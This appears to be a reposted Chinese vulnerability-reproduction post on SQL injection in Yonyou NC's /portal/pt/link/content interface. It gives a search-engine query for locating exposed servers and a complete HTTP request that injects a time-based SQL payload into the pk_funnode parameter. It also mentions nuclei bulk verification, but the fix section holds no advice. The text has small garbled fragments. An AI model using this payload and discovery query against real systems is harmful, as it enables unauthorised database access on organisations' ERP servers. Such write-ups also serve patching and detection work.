用友NC/link/content接口存在SQL注入,攻击者可以通过此接口进行执行sql命令。
0x03 影响范围
浪用友NC
0x04 网络空间测绘查询
product="用友-UFIDA-NC" && icon_hash="1085941792"
GET
/portal/pt/link/content?pageId=login&pk_funnode=1'waitfor+delay+'0:0:6'--
HTTP/1.1
Host
: 11.11.11.11
User-Agent
: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Connection
: close
Accept-Encoding
: gzip, deflate
0x06 nuclei批量验证(已上传纷传)
0x07 修复建议
原文始发于微信公众号(网安探索队):用友NC/link/content-SQL注入【漏洞复现】
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论